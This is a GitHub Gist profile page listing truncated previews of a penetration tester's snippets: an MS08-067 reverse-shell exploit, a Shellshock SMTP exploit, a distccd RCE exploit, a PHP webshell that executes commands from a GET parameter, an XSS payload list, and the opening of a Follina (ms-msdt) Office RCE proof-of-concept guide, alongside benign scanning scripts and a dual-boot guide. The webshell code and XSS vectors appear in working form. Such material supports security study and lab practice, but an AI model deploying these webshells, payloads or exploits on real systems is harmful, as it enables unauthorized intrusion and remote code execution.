Skip to content

Instantly share code, notes, and snippets.

View cxzero's full-sized avatar
☺️

Juan Pablo Perata cxzero

☺️
70 followers · 897 following
View GitHub Profile
@cxzero
cxzero / ms08-067-fixed.py
Last active April 9, 2021 04:40 — forked from thel3l/ms08-067-fixed.py
Updated ms08-67 exploit without custom netcat listener.
#!/usr/bin/python
###############################################################################################
# MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 #
# Designed for Kali Linux - msfvenom and nc required to function #
# Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ #
# Modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/). #
# The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi #
###############################################################################################
import struct
@cxzero
cxzero / massports.sh
Last active April 28, 2021 23:04
Simple script to help in running masscan againsts all TCP and UDP ports of a given IP, grep results and display them in a format which can then be used by other tools, example nmap. tun0 interface is used, adjust as necessary
#!/bin/bash
# Simple script to help in running masscan againsts all TCP and UDP ports,
# grep results and display them in a format which can then be used by other tools, example nmap
# massports.sh by cxzero
if [ $# -eq 0 ]; then
echo "usage: massports.sh <IP>"
exit 1
fi
@cxzero
cxzero / exploit.py
Created May 1, 2021 05:02 — forked from claudijd/exploit.py
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
@cxzero
cxzero / easy-simple-php-webshell.php
Created May 12, 2021 03:27 — forked from joswr1ght/easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@cxzero
cxzero / readme.md
Last active June 1, 2021 18:37
Install Ubuntu 20.04 LTS alongside dual boot with Windows 10

Recently I have found a little harder to set up a dual boot installation Ubuntu 20.04 LTS / Windows 10 in a laptop. It involved:

  1. Switch SSD operation mode from RST to AHCI
  2. Prepare usb stick for Ubuntu iso image to load in UEFI mode (BIOS does not support legacy mode)
  3. Shrink Windows 10 partition
  4. Ubuntu 20.04 installation, create encrypted LVM partition
  5. Enjoy the set up

1 - Switch SSD operation mode from RST to AHCI

@cxzero
cxzero / command.xml
Created July 16, 2021 13:38 — forked from georgestephanis/command.xml
How to upload a file to a WordPress site via the XML-RPC API. Pretty easy, no? The attachment page if you want a html wrapper to present the file can be found at the following URL: http://yoursite.com/?attachment_id=722 (I left the ID the successful response in as an example)
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
@cxzero
cxzero / distccd_rce_CVE-2004-2687.py
Created August 14, 2021 17:50 — forked from DarkCoderSc/distccd_rce_CVE-2004-2687.py
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
distccd v1 RCE (CVE-2004-2687)
This exploit is ported from a public Metasploit exploit code :
https://www.exploit-db.com/exploits/9915
@cxzero
cxzero / nmapPorts.sh
Last active June 13, 2022 16:00
Utility to extract ports from nmap grepable output
#!/bin/bash
# To be used with nmap grepable output (-oG option)
if [ -z $1 ]; then
echo "Usage: $(basename $0) <grepable-nmap-input-file>"
exit -1
fi
ports="`cat $1 | grep -oP '\s\K[0-9]+(?=/)'`"
echo $ports | xargs | sed 's/ /,/g'
@cxzero
cxzero / xss_vectors.txt
Created May 13, 2022 16:17 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@cxzero
cxzero / ms-msdt.MD
Created June 10, 2022 01:30 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.